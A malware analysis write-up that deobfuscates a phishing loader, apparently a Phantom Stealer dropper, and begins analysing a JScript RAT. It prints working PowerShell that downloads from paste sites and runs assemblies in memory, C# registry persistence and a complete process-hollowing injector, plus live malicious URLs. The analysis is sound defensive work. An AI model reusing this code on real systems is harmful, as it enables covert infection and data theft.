%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\powershell.exe -Command "Start-Process %SYSTEMROOT%\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden -ArgumentList '-Command \"$ddsdfgo = ''...'';$oWfdfjfdsuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string([regex]::Replace($ddsdfgo, ''f#'', ''r'')));iex $oWfdfjfdsuxd\"'"; Copy-Item -Path '%~f0' -Destination 'C:\ProgramData\URT.bat' -Force -ErrorAction SilentlyContinue"
PowerShell Downloader
The base64-encoded PowerShell command is obfuscated by replacing “r” with “f#” and stored in the “$ddsdfgo” variable and can be deobfuscated and decoded with a little more Python.
from base64 import b64decode
encoded = re.search(r"\$ddsdfgo = ''([A-Za-z0-9+/=#]+)''", command)[1]
result = b64decode(encoded.replace("f#", "r")).decode("utf-16le")
The PowerShell code begins with a 3 second sleep, likely waiting for the batch file to be copied.
Then, it defines the DownloadDataFromLinks which iterates over an array of links in random order
and returns the first result that was downloaded successfully. The array contains the following links:
- https://hasteb.in/ii5PfCz83aTcDgK
- https://pastefy.app/eKkAgMVM/raw
Start-Sleep -Seconds 3
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
function DownloadDataFromLinks { param ([string[]]$links)
$webClient = New-Object System.Net.WebClient;
$shuffledLinks = Get-Random -InputObject $links -Count $links.Length;
foreach ($link in $shuffledLinks) {
try { return $webClient.DownloadData($link) } catch { continue }
};
return $null
};
$Bytes = 'http';
$Bytes2 = 's://';
$lfsdfsdg = $Bytes +$Bytes2;
$links = @(($lfsdfsdg + 'hasteb.in/ii5PfCz83aTcDgK'),($lfsdfsdg + 'pastefy.app/eKkAgMVM/raw'));
$imageBytes = DownloadDataFromLinks $links;
If the download was successful, the script searches for “<<START>>” and “<<END>>”
markers within the data, a technique commonly seen in malware using steganography for obfuscation.
Though no actual steganography is involved in this case, as the downloaded file contains only
base64-encoded data surrounded by the aforementioned markers. The content between the markers
is base64-decoded and loaded into memory as a .NET assembly. Then, the type “myprogram.Homees”
is loaded from the assembly, in between two Get-Process calls (more junk code).
Finally, the “runss” method of the type is invoked using the following parameters:
- “txt.daordop/pw4a9a/piv.lenapym//:s”
- “1”
- “URT”
- “RegAsm”
- “0”
- “x86”
if ($imageBytes -ne $null) {
$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);
$startFlag = '<<START>>';
$endFlag = '<<END>>';
$startIndex = $imageText.IndexOf($startFlag);
$endIndex = $imageText.IndexOf($endFlag);
if ($startIndex -ge 0 -and $endIndex -gt $startIndex) {
$startIndex += $startFlag.Length;
$base64Lengthh = $endIndex - $startIndex;
$base64Command = $imageText.Substring($startIndex, $base64Lengthh);
$endIndex = $imageText.IndexOf($endFlag);
$commandBytes = [System.Convert]::FromBase64String($base64Command);
$endIndex = $imageText.IndexOf($endFlag);
$endIndex = $imageText.IndexOf($endFlag);
$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);
Get-Process | Sort-Object CPU -Descending | Select-Object -First 5 | Format-Table Name,CPU
$type = $loadedAssembly.GetType('myprogram.Homees');
Get-Process | Sort-Object CPU -Descending | Select-Object -First 5 | Format-Table Name,CPU
$injec = 'Reg' + 'Asm';
$gg = 'txt.daordop/pw4a9a/piv.lenapym//:sgsffsf' ; $gg = $gg.Substring(0, $gg.Length - 6)
$method = $type.GetMethod('runs' + 's').Invoke($null, [object[]] ($gg ,'1', 'URT', $injec, '0' , 'x86'))
}
}
.NET Process Injector
The base64-encoded data between the markers can be decoded with the following recipe:
Regular_expression('User defined','<<START>>([A-Za-z0-9+/=]+)<<END>>',false,false,false,false,false,false,'List capture groups')
From_Base64('A-Za-z0-9+/=',false,false)
The result is a 64-bit .NET executable with the following metadata:
- Comments: progrfam
- Company Name: profgram
- File Description: Myrpfgoram
- File Version: 2.0.0.12
- Internal Name: myprogram.exe
- Legal Copyright: Copyright © 2027
- Original File Name: myprogram.exe
- Product Name: program
- Product Version: 2.0.0.12
- Assembly Version: 2.0.4.12
According to Detect-It-Easy, the assembly is obfuscated by “Smart Assembly” so I used de4dotEx to deobfuscate it before decompiling it with ILSpy. The assembly name is “myprogram” and the entry point is “myprogram.sha.Main”.
The entry point initialises a Windows form with a text box and four buttons. It doesn’t load any malicious code and is meant to appear legitimate to anyone who runs the executable.
private static void Main() {
Environment.GetFolderPath(Environment.SpecialFolder.Startup);
Application.SetCompatibleTextRenderingDefault(defaultValue: false);
Application.Run(new Form1());
Application.EnableVisualStyles();
}
The actual entry point of the malware is “myprogram.Homees.runss”, which is the
function loaded in memory by the PowerShell script. It is annotated with the
attribute DebuggerNonUserCode which instructs the debugger not to display this
function in the debugger window and to step through its code automatically.
The following parameters are passed to the function by the PowerShell script:
| Name | Value |
|---|---|
adress | “txt.daordop/pw4a9a/piv.lenapym//:s” |
enablestartup | “1” |
startupname | “URT” |
injection | “RegAsm” |
persistence | “0” |
architecture | “x86” |
[DebuggerNonUserCode]
public static void runss(string adress, string enablestartup, string startupname, string injection, string persistence = "0", string architecture = "x86")
Persistence
Startup persistence is established by writing a RunOnce registry value to HKEY_CURRENT_USER,
falling back to Run if it fails. The folder path is set to the “Startup” folder by default,
though it is subsequently set to the “CommonApplicationData” (“ProgramData”) folder in all cases.
string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.Startup);
The registry key is set to a random name through the RandomString
helper function which uses the alphabet “abcdefghijklmnoFAS”.
public static Random random = new Random();
private static string RandomString(int length) {
return new string((from s in Enumerable.Repeat("abcdefghijklmnoFAS", length)
select s[random.Next(s.Length)]).ToArray());
}
The enablestartup parameter controls the value of the registry key. In this case, it is defined
as “1” which sets the value to a “.bat” with the given startupname (currently defined as “URT”).
if (enablestartup == "1") {
folderPath = Environment.GetFolderPath(Environment.SpecialFolder.CommonApplicationData);
try {
Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce", writable: true).SetValue(value: Path.Combine(folderPath, startupname + ".bat"), name: RandomString(10));
} catch {
Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", writable: true).SetValue(value: Path.Combine(folderPath, startupname + ".bat"), name: RandomString(10));
}
}
When the value of the parameter is “2”, the run key launches a “.vbs” script via “wscript.exe”. Unless the process is running from “System32” or “SysWOW64”, it also kills the process injection candidates “RegAsm.exe”, “Vbc.exe”, and “MsBuild.exe”, sleeps two seconds, and self-replicates by copying the most recently created “.vbs” file into the folder path.
if (enablestartup == "2") {
folderPath = Environment.GetFolderPath(Environment.SpecialFolder.CommonApplicationData);
try {
Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce", writable: true).SetValue(value: "wscript.exe \"" + Path.Combine(folderPath, startupname + ".vbs") + "\"", name: RandomString(10));
} catch {
Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", writable: true).SetValue(value: "wscript.exe \"" + Path.Combine(folderPath, startupname + ".vbs") + "\"", name: RandomString(10));
}
string currentDirectory = Environment.CurrentDirectory;
if (!currentDirectory.StartsWith("C:\\Windows\\System32", StringComparison.OrdinalIgnoreCase) && !currentDirectory.StartsWith("C:\\Windows\\SysWOW64", StringComparison.OrdinalIgnoreCase)) {
RunPS("Start-Process cmd.exe -ArgumentList '/c taskkill /IM RegAsm.exe /F & taskkill /IM Vbc.exe /F & taskkill /IM MsBuild.exe /F' -WindowStyle Hidden -Wait");
Thread.Sleep(2000);
RunPS("-WindowStyle Hidden if ((Get-Location).Path -ne '" + folderPath + "') { (Get-ChildItem *.vbs | Sort-Object CreationTime -Descending | Select-Object -First 1) | Copy-Item -Destination '" + Path.Combine(folderPath, startupname + ".vbs") + "' -Force }");
}
}
PowerShell is spawned through the RunPS helper function which is also annotated with the
DebuggerNonUserCode attribute. It launches a hidden PowerShell window and suppresses errors.
[DebuggerNonUserCode]
public static void RunPS(string args)
{
try {
ProcessStartInfo processStartInfo = new ProcessStartInfo();
processStartInfo.FileName = "powershell.exe";
processStartInfo.Arguments = args;
processStartInfo.WindowStyle = ProcessWindowStyle.Hidden;
Process process = new Process();
process.StartInfo = processStartInfo;
process.Start();
} catch { }
}
When the value of the parameter is “3”, the run key launches a “.js” script via “wscript.exe“. It also unconditionally kills the process injection candidates “RegAsm.exe”, “Vbc.exe”, and “MsBuild.exe” and sleeps for two seconds.
if (enablestartup == "3") {
folderPath = Environment.GetFolderPath(Environment.SpecialFolder.CommonApplicationData);
try {
Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce", writable: true).SetValue(value: "wscript.exe \"" + Path.Combine(folderPath, startupname + ".js") + "\"", name: RandomString(10));
} catch {
Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", writable: true).SetValue(value: "wscript.exe \"" + Path.Combine(folderPath, startupname + ".js") + "\"", name: RandomString(10));
}
RunPS("Start-Process cmd.exe -ArgumentList '/c taskkill /IM RegAsm.exe /F & taskkill /IM Vbc.exe /F & taskkill /IM MsBuild.exe /F' -WindowStyle Hidden -Wait");
Thread.Sleep(2000);
}
Finally, if persistence is defined as “1” and enablestartup is not “0”, the function writes
a batch file named “wrfdse.bat” to the temporary folder and executes it. The script loops up to
1000 times, sleeping for a minute between iterations, and restarts the “.vbs” startup script if
the injected process is not currently running. Note that this script won’t work when enablestartup
is defined as “1” or “3”, despite passing the condition, since it expects a “.vbs” file.
if (persistence == "1" && enablestartup != "0") {
string text2 = Path.GetTempPath() + "wrfdse.bat";
using (StreamWriter streamWriter = new StreamWriter(text2)) {
streamWriter.WriteLine("set count=0");
streamWriter.WriteLine(":loop");
streamWriter.WriteLine("set /a count=%count%+1");
streamWriter.WriteLine("timeout 60 ");
streamWriter.WriteLine("tasklist /fi \"ImageName eq " + injection + ".exe\" /fo csv 2>NUL | find /I \"" + injection + ".exe\">NUL");
streamWriter.WriteLine("if \"%ERRORLEVEL%\"==\"1\" cscript \"" + Path.Combine(folderPath, startupname) + ".vbs\"");
streamWriter.WriteLine("if %count% neq 1000 goto loop");
}
Process process = new Process();
process.StartInfo.FileName = text2;
process.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
process.StartInfo.ErrorDialog = true;
process.Start();
}
Process Injection
After setting up the startup run key and before the injection persistence script, the “runss”
function downloads a payload from the URL defined by adress. The parameter value is appended
with “ptth” and reversed, resulting here into the URL “https://mypanel.vip/a9a4wp/podroad.txt”.
The text is reversed and base64-decoded, after replacing any instances of “DTre” and “DgTre”
with “/d” and “+” respectively. The resulting payload is passed to the MemoryMapper.Map32
function if the architecture parameter is defined as “x86”, or to MemoryMapper.Map64 otherwise.
WebClient webClient = new WebClient();
webClient.Encoding = Encoding.UTF8;
adress += "ptth";
adress = string.Concat(adress.Reverse());
string text = string.Concat(webClient.DownloadString(adress).Reverse());
byte[] payload = (text.Contains("DTre") ? Convert.FromBase64String(text.Replace("DTre", "/d")) : (text.Contains("DgTre") ? Convert.FromBase64String(text.Replace("DgTre", "+")) : Convert.FromBase64String(text.Replace("DgTre", "+"))));
if (!(architecture == "x86")) {
MemoryMapper.Map64(payload, injection, "");
} else {
MemoryMapper.Map32(payload, injection, "0");
}
The MemoryMapper class declares native Windows API structures alongside delegates
for native functions often used in process injection and in particular process hollowing.
STARTUP_64(64-bitSTARTUPINFOA)PROCESS_64(64-bitPROCESS_INFORMATION)STARTUP_32(32-bitSTARTUPINFOA)PROCESS_32(32-bitPROCESS_INFORMATION)
private delegate bool _CreateProcessA(string lpApplicationName, string lpCommandLine, IntPtr lpProcessAttributes, IntPtr lpThreadAttributes, bool bInheritHandles, uint dwCreationFlags, IntPtr lpEnvironment, string lpCurrentDirectory, ref STARTUP_64 lpStartupInfo, out PROCESS_64 lpProcessInformation);
private delegate IntPtr _VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
private delegate bool _WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, int nSize, out int lpNumberOfBytesWritten);
private delegate bool _VirtualProtectEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, uint flNewProtect, out uint lpflOldProtect);
private delegate bool _ZwUnmapViewOfSection(IntPtr hProcess, IntPtr lpBaseAddress);
private delegate bool _GetThreadContext(IntPtr hThread, IntPtr lpContext);
private delegate bool _SetThreadContext(IntPtr hThread, IntPtr lpContext);
private delegate uint _ResumeThread(IntPtr hThread);
private delegate bool _CloseHandle(IntPtr hObject);
private delegate bool _CreateProcessA32(string lpApplicationName, string lpCommandLine, IntPtr lpProcessAttributes, IntPtr lpThreadAttributes, bool bInheritHandles, uint dwCreationFlags, IntPtr lpEnvironment, string lpCurrentDirectory, ref STARTUP_32 lpStartupInfo, ref PROCESS_32 lpProcessInformation);
private delegate int _VirtualAllocEx32(IntPtr hProcess, int lpAddress, int dwSize, int flAllocationType, int flProtect);
private delegate bool _WriteProcessMemory32(IntPtr hProcess, int lpBaseAddress, byte[] lpBuffer, int nSize, ref int lpNumberOfBytesWritten);
private delegate bool _ReadProcessMemory32(IntPtr hProcess, int lpBaseAddress, ref int lpBuffer, int nSize, ref int lpNumberOfBytesRead);
private delegate int _ZwUnmapViewOfSection32(IntPtr hProcess, int lpBaseAddress);
private delegate bool _GetThreadContext32(IntPtr hThread, int[] lpContext);
private delegate bool _Wow64GetThreadContext32(IntPtr hThread, int[] lpContext);
private delegate bool _SetThreadContext32(IntPtr hThread, int[] lpContext);
private delegate bool _Wow64SetThreadContext32(IntPtr hThread, int[] lpContext);
private delegate int _ResumeThread32(IntPtr hThread);
Next, it defines an array containing two hex-encoded library names which are decoded
using the HexDecode helper function and correspond to “kernel32” and “ntdll”.
private static readonly string[] _libNames = new string[2] {
HexDecode("6b65726e656c3332"),
HexDecode("6e74646c6c")
};
private static string HexDecode(string hex) {
byte[] array = new byte[hex.Length / 2];
for (int i = 0; i < array.Length; i++) {
array[i] = Convert.ToByte(hex.Substring(i * 2, 2), 16);
}
return Encoding.UTF8.GetString(array);
}
Then, it imports the LoadLibraryA and GetProcAddress functions from “kernel32”.
These are used by the generic GetProc function to retrieve the pointers of
delegated functions and load them using the Marshal.GetDelegateForFunctionPointer
method of the .NET framework.
[DllImport("kernel32", SetLastError = true)]
private static extern IntPtr LoadLibraryA([MarshalAs(UnmanagedType.LPStr)] string lpFileName);
[DllImport("kernel32", SetLastError = true)]
private static extern IntPtr GetProcAddress(IntPtr hModule, [MarshalAs(UnmanagedType.LPStr)] string lpProcName);
private static T GetProc<T>(string library, string function) where T : notnull, Delegate {
IntPtr intPtr = LoadLibraryA(library);
if (!(intPtr == IntPtr.Zero)) {
IntPtr procAddress = GetProcAddress(intPtr, function);
if (procAddress == IntPtr.Zero) {
throw new Win32Exception();
}
return Marshal.GetDelegateForFunctionPointer<T>(procAddress);
}
throw new Win32Exception();
}
For brevity, I will only analyse the Map32 function and skip the similar Map64 function.
The Map32 function implements the 32-bit process hollowing logic. It attempts the injection
up to a certain number of times (55 by default), sleeping for 50 milliseconds on each failure.
public static void Map32(byte[] payload, string host, string args = null, int maxTries = 55) {
for (int i = 0; i < maxTries; i++) {
try {
// see below
} catch {
if (i == maxTries - 1) {
throw;
}
Thread.Sleep(50);
}
}
}
It loads the native Windows API functions needed for 32-bit process hollowing from their
delegates, builds the target application path from the given host parameter, corresponding
to a .NET framework host binary in “C:\Windows\Microsoft.NET\Framework\v4.0.30319”,
and initialises the STARTUPINFOA AND PROCESS_INFORMATION structures.
_CreateProcessA32 proc = GetProc<_CreateProcessA32>(_libNames[0], "CreateProcessA");
_VirtualAllocEx32 proc2 = GetProc<_VirtualAllocEx32>(_libNames[0], "VirtualAllocEx");
_WriteProcessMemory32 proc3 = GetProc<_WriteProcessMemory32>(_libNames[0], "WriteProcessMemory");
_ReadProcessMemory32 proc4 = GetProc<_ReadProcessMemory32>(_libNames[0], "ReadProcessMemory");
_ZwUnmapViewOfSection32 proc5 = GetProc<_ZwUnmapViewOfSection32>(_libNames[1], "ZwUnmapViewOfSection");
_GetThreadContext32 proc6 = GetProc<_GetThreadContext32>(_libNames[0], "GetThreadContext");
_Wow64GetThreadContext32 proc7 = GetProc<_Wow64GetThreadContext32>(_libNames[0], "Wow64GetThreadContext");
_SetThreadContext32 proc8 = GetProc<_SetThreadContext32>(_libNames[0], "SetThreadContext");
_Wow64SetThreadContext32 proc9 = GetProc<_Wow64SetThreadContext32>(_libNames[0], "Wow64SetThreadContext");
_ResumeThread32 proc10 = GetProc<_ResumeThread32>(_libNames[0], "ResumeThread");
string lpApplicationName = "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\" + host + ".exe";
STARTUP_32 lpStartupInfo = new STARTUP_32 {
cb = (uint)Marshal.SizeOf<STARTUP_32>()
};
PROCESS_32 lpProcessInformation = default(PROCESS_32);
Then, it creates the target host process using CreateProcessA, throwing an error
if the process creation failed. If the process was created successfully but the
process hollowing part failed, the process is killed via “taskkill”. The process
is created with the flag 2147483652u, i.e. 0x00000004 | 0x80000000. The value
0x00000004 corresponds to CREATE_SUSPENDED but 0x80000000 does not correspond to
any flag or combination of flags, so only CREATE_SUSPENDED is applied. The unknown
value is most likely a typo for 0x08000000 which corresponds to CREATE_NO_WINDOW1.
CREATE_SUSPENDED: The main thread of the process is created in a suspended state.CREATE_NO_WINDOW: The process is a console application that runs without a window.
if (proc(lpApplicationName, string.Empty, IntPtr.Zero, IntPtr.Zero, bInheritHandles: false, 2147483652u, IntPtr.Zero, null, ref lpStartupInfo, ref lpProcessInformation)) {
try {
// see below
} catch {
try {
Process.Start(new ProcessStartInfo {
FileName = "taskkill",
Arguments = $"/PID {lpProcessInformation.dwProcessId} /F",
CreateNoWindow = true,
UseShellExecute = false
})?.WaitForExit();
} catch { }
throw;
}
}
throw new Exception("CreateProcess failed");
Next, it extracts an integer from the payload at offset 60 (e_lfanew)2, which points
to the start of the PE header in the PE file format and reads another integer from
the PE header at offset 80, which corresponds to SizeOfImage3, the total
size the image occupies in memory once loaded. Note that normally the offset used
here would be 52 which corresponds to ImageBase, the preferred base address of
the image when loaded in memory. It then initializes an integer array of size 179
(716 bytes), matching the size of an x86 CONTEXT4 or WOW64_CONTEXT5 structure.
The first element is set to 65563 which, in an x86 thread context, corresponds to
CONTEXT_CONTROL | CONTEXT_INTEGER | CONTEXT_FLOATING_POINT | CONTEXT_DEBUG_REGISTERS6,
retrieving control registers, integer registers, floating-point state, and debug registers.
The thread context is stored in the array using Wow64GetThreadContext when running on a
64-bit system, or GetThreadContext on a 32-bit system (where the integer size is 4 bytes).
int num = BitConverter.ToInt32(payload, 60);
int num2 = BitConverter.ToInt32(payload, num + 80);
int[] array = new int[179];
array[0] = 65563;
if (!((IntPtr.Size != 4) ? proc7(lpProcessInformation.hThread, array) : proc6(lpProcessInformation.hThread, array))) {
throw new Exception("GetThreadContext failed");
}
Then, it retrieves the element at index 41 from the array, which corresponds to
the Ebx field of the context structure when it is marshalled into an integer
array. The EBX register points to the Process Environment Block (PEB) structure.
The ReadProcessMemory function is used to extract an integer at offset 8
(ImageBaseAddress7) of the PEB from the memory of the suspended process.
Next, if this address matches the SizeOfImage that was retrieved earlier,
it calls the ZwUnmapViewOfSection function unmap the original image.
Note that this check should be using ImageBase rather than SizeOfImage
and may leave the original image still mapped in memory.
int num3 = array[41];
int lpBuffer = 0;
int lpNumberOfBytesRead = 0;
if (!proc4(lpProcessInformation.hProcess, num3 + 8, ref lpBuffer, 4, ref lpNumberOfBytesRead)) {
throw new Exception("ReadProcessMemory failed");
}
if (num2 == lpBuffer && proc5(lpProcessInformation.hProcess, lpBuffer) != 0) {
throw new Exception("ZwUnmapViewOfSection failed");
}
Next, it extracts the integer SizeOfHeaders from offset 84 of the optional
header, the total size of all file headers rounded up to account for file alignment.
It uses the VirtualAllocEx function to allocate memory of size SizeOfImage
in the target process at the address of SizeOfImage (which normally would
have been ImageBase), with allocation flag 12288 which corresponds to
MEM_COMMIT | MEM_RESERVE8, thus committing and reserving memory pages in one step,
and protection flag 64 which corresponds to PAGE_EXECUTE_READWRITE9 and enables
read, write, and execute permissions in the memory region. Also, it uses the
WriteProcessMemory function to write bytes of size SizeOfHeaders
(i.e., the PE headers) from the payload into the allocated memory region.
int nSize = BitConverter.ToInt32(payload, num + 84);
int num4 = proc2(lpProcessInformation.hProcess, num2, num2, 12288, 64);
if (num4 == 0) {
throw new Exception("VirtualAllocEx failed");
}
int lpNumberOfBytesWritten = 0;
if (!proc3(lpProcessInformation.hProcess, num4, payload, nSize, ref lpNumberOfBytesWritten)) {
throw new Exception("WriteProcessMemory (headers) failed");
}
Then, it locates the first section header at offset 248 of the PE header
and reads the total number of sections from offset 6 of the PE header.
It loops over each section of 40 bytes, reading the following section fields10:
VirtualAddress(offset12): The memory address of the first byte relative to the image base.SizeOfRawData(offset16): The total size of the raw data in bytes.PointerToRawData(offset20): The byte offset to the start of the raw data.
If the section is not empty, its data is copied from the payload and written into
the allocated memory of the target process at its corresponding virtual address
using the WriteProcessMemory function. After the section loop ends, the
WriteProcessMemory function is called once more to overwrite the PEB of the
target process so its ImageBaseAddress reflects the new image address.
int num5 = num + 248;
short num6 = BitConverter.ToInt16(payload, num + 6);
for (int j = 0; j < num6; j++) {
int num7 = num5 + j * 40;
int num8 = BitConverter.ToInt32(payload, num7 + 12);
int num9 = BitConverter.ToInt32(payload, num7 + 16);
int sourceIndex = BitConverter.ToInt32(payload, num7 + 20);
if (num9 > 0) {
byte[] array2 = new byte[num9];
Array.Copy(payload, sourceIndex, array2, 0, num9);
if (!proc3(lpProcessInformation.hProcess, num4 + num8, array2, num9, ref lpNumberOfBytesWritten)) {
throw new Exception($"WriteProcessMemory (section {j}) failed");
}
}
}
if (!proc3(lpBuffer: BitConverter.GetBytes(num4), hProcess: lpProcessInformation.hProcess, lpBaseAddress: num3 + 8, nSize: 4, lpNumberOfBytesWritten: ref lpNumberOfBytesWritten)) {
throw new Exception("WriteProcessMemory (PEB) failed");
}
Next, it sets the element at index 44 of the array, which corresponds to the
Eax field (Extended Accumulator register) of the marshalled context structure,
to the address of the entry point (AddressOfEntryPoint at offset 40 of the
PE header) within the memory region allocated earlier by VirtualAllocEx.
Depending on the target system, it calls Wow64SetThreadContext or SetThreadContext
to commit the updated context to the suspended thread. Finally, it calls ResumeThread
to wake the suspended thread, which will now begin execution at the injected payload’s
entry point. If the call succeeds it exits the loop, otherwise it throws an exception.
array[44] = num4 + BitConverter.ToInt32(payload, num + 40);
if (!((IntPtr.Size != 4) ? proc9(lpProcessInformation.hThread, array) : proc8(lpProcessInformation.hThread, array))) {
throw new Exception("SetThreadContext failed");
}
if (proc10(lpProcessInformation.hThread) != -1) {
break;
}
throw new Exception("ResumeThread failed");
Unidentified Final Stage
Unfortunately, I cannot analyse the final stage since the file was taken down shortly after I received the email, as indicated by the takedown times of two similar URLs reported on URLhaus. Both URLs are tagged as “Phantom Stealer” so in all likelihood the sample I received is also of the same family.
Indicators of Compromise
| Type | Value | Links | Comment |
|---|---|---|---|
| abm@abmshipsupply.com | N/A | Sender address | |
| Domain | abmshipsupply.com | MXToolBox VirusTotal | Sender domain |
| IP | 158.94.208.218 | AbuseIPDB | Sender IP |
| Hash | 0b05ceeae3be9bb1b83bb079e4a58421 | VirusTotal ANY.RUN | Abm 2026 H1 G�ncel Fiyat Listesi .r07 |
| Hash | cd7219d7aa99db6647c5519d24e8cdd3 | VirusTotal | Abm 2026 H1 Güncel Fiyat Listesi .exe |
| Hash | 42753d1bc479c0f14d8f98ca77a5b15a | VirusTotal | URT.bat |
| Hash | 73ffb8eaeeeefa545096ae9d2080afb4 | VirusTotal | PowerShell Downloader |
| Hash | 99446a0be47d814a344b5c88c5559d59 | VirusTotal Triage | myprogram.exe |
| URL | https://hasteb.in/ii5PfCz83aTcDgK | VirusTotal | Stage 4 Download |
| URL | https://pastefy.app/eKkAgMVM/raw | VirusTotal | Stage 4 Download |
| URL | https://mypanel.vip/a9a4wp/podroad.txt | VirusTotal | Stage 5 Download |
MITRE ATT&CK® Techniques
-
Process Creation Flags (WinBase.h) - Win32 apps | Microsoft Learn ↩
-
IMAGE_OPTIONAL_HEADER32 (winnt.h) - Win32 apps | Microsoft Learn ↩
-
VirtualAllocEx function (memoryapi.h) - Win32 apps | Microsoft Learn ↩
-
Memory Protection Constants (WinNT.h) - Win32 apps | Microsoft Learn ↩
-
IMAGE_SECTION_HEADER (winnt.h) - Win32 apps | Microsoft Learn ↩
Nueva orden de compra 4504238494
On April 14 2026, 17:16 UTC, I received an email with the following details:
| From | Subject | Sender address | Sender IP |
|---|---|---|---|
| “Tahany ElBarmawy” <dao@ambserbie-alger.com> | Nueva orden de compra 4504238494 | dao@ambserbie-alger.com | 85.137.51.11 |
The subject is in Spanish and translates to “New purchase order 4504238494”.
The sender domain has not configured DKIM and DMARC and the SPF check failed, which indicates that the email was likely spoofed. The website currently redirects to “ambserbie-alger-com.hostdz.website” and returns an internal server error. Based on references from other sites, as well as previous snapshots from the Internet Archive, it belongs to the Serbian Embassy in Algeria.
The email contains the following attachment:
| Name | Type | Magic | SHA256 |
|---|---|---|---|
| GR5000171604.7z | 7ZIP | 7-zip archive data, version 0.4 | 745158871066b7e3aa4ed48234c5f24b |
Analysis
Extracting the attached archive yields the file “GR5000171604.js”, which is obfuscated via “Obfuscator.io” and I deobfuscated using webcrack. This script is not a loader for a multi-stage malware but instead contains the entire functionality. This analysis organises the functional components of the script into five sections based on their role. Since the script is self-contained, many parts of the implementation will be omitted to prevent reproduction of the malware.
Environment Setup
The script defines the numeric enums v and v94 and the string enum v19.
var v;
(function (p11) {
p11[p11.Running = 0] = "Running";
p11[p11.Finished = 1] = "Finished";
p11[p11.ErrorOccured = 2] = "ErrorOccured";
})(v ||= {});
var v19;
(function (p56) {
p56.GetFile = "ex";
p56.GetLoader = "sb";
p56.GetPayload = "vc";
p56.GetProperties = "df";
p56.GetUpdate = "kp";
p56.GetShell = "tw";
})(v19 ||= {});
var v94;
(function (p78) {
p78[p78.NEW = 0] = "NEW";
p78[p78.RUNNABLE = 1] = "RUNNABLE";
p78[p78.BLOCKED = 2] = "BLOCKED";
p78[p78.WAITING = 3] = "WAITING";
p78[p78.TIMED_WAITING = 4] = "TIMED_WAITING";
p78[p78.TERMINATED = 5] = "TERMINATED";
})(v94 ||= {});
The vF class stores a callback function to be executed later via its Run method.
var vF = function () {
function f(p) {
this.action = p;
}
f.prototype.Run = function () {
this.action.apply(this.action);
};
return f;
}();
The vF2 class includes functions for managing callbacks stored in the ExitCallbacks array.
AddExitCallbackadds a callback to an array ensuring uniqueness.RemoveExitCallbackremoves a callback from the array.DoExitCallbackexecutes all callbacks while ignoring errors.Initializepolyfills theArray.filter,Array.map,String.trimmethods, which are not available in JScript, and defines the functionsString.IsNullOrWhiteSpaceandString.Reverse.Runis responsible for calling theMainmethod of a given object using the script’s CLI arguments and executes the exit callbacks even if the method throws an error.
var vF2 = function () {
function f2() {}
f2.AddExitCallback = function (p2) { /* omitted */ };
f2.RemoveExitCallback = function (p3) { /* omitted */ };
f2.DoExitCallback = function () { /* omitted */ };
f2.Initialize = function () {
Array.prototype.filter = function (p4, p5) { /* omitted */ };
Array.prototype.map = function (p6, p7) { /* omitted */ };
String.IsNullOrWhiteSpace = function (p8) {
return p8 == null || /\S/.test(p8) == 0;
};
String.Reverse = function (p9) {
return p9.split("").reverse().join("");
};
String.prototype.trim = function () { /* omitted */ };
};
f2.Run = function (p10) {
for (var v16 = WSH.Arguments, v17 = [], v18 = 0; v18 < v16.length; v18++) {
v17[v18] = v16.Item(v18);
}
try {
p10.Main(v17);
} finally {
this.DoExitCallback();
}
};
f2.ExitCallbacks = [];
return f2;
}();
The vF6 class implements JSON.stringify which is also not available in JScript.
It uses the f6 class to represent serialised objects.
function f6() {
this.Ignore = false;
this.String = "";
}
var vF6 = function () {
function f7() {}
f7._formatString = function (p52 = "") { /* omitted */ };
f7._stringify = function (p54) { /* omitted */ };
f7.stringify = function (p55) { /* omitted */ };
f7._escapable = /* omitted */;
f7._meta = { /* omitted */ };
return f7;
}();
Abstraction Layer
Operating System
The vF3 / vVF3 class implements abstractions for OS operations.
It defines the Object property, which is an instance of the
Wscript.Shell COM object, and the wscriptShell property,
which is a reference to the global Windows Script Host object.
CreateObjectwrapsActiveXObjectto create a COM object.Execwraps theExecmethod ofWscript.Shellto execute a command.Exitruns the registered exit callbacks and quits the script.GetArgumentswrapsWSH.Argumentsto return the CLI arguments of the script.GetCurrentDirectorywraps theCurrentDirectoryproperty ofWscript.Schellto return the current working directory.GetCurrentScriptFilewrapsWSH.ScriptFullNameto return the path of the executing script.GetEnviromentVariablewraps theExpandEnvironmentStringsmethod ofWscript.Shellto return the value of an environment variable.GetScriptHostFilewrapsWSH.FullNameto return the path of the script host executable.OpenFilelazy-loads an instance of theShell.ApplicationCOM object and calls itsShellExecutemethod to open a file.QueryWMIServicelazy-loads a WMI object using theGetObjectfunction1. Then, it executes a WMI query and returns the results as an array.Runwraps theRunmethod ofWscript.Shellto execute a command. UnlikeExec, this method does not return the output.RunScriptexecutes another script via the script host, sleeps briefly, and returns a boolean indicating whether the execution was successful. Thep22parameter is the path of the script and any extra parameters passed to the function are provided as CLI arguments to the script.SleepwrapsWSH.Sleepto sleep for a given number of milliseconds.
var vF3 = function () {
function f3() {}
f3.CreateObject = function (p12) { /* omitted */ };
f3.Exec = function (p13) { /* omitted */ };
f3.Exit = function (p14) { /* omitted */ };
f3.GetArguments = function () { /* omitted */ };
f3.GetCurrentDirectory = function () { /* omitted */ };
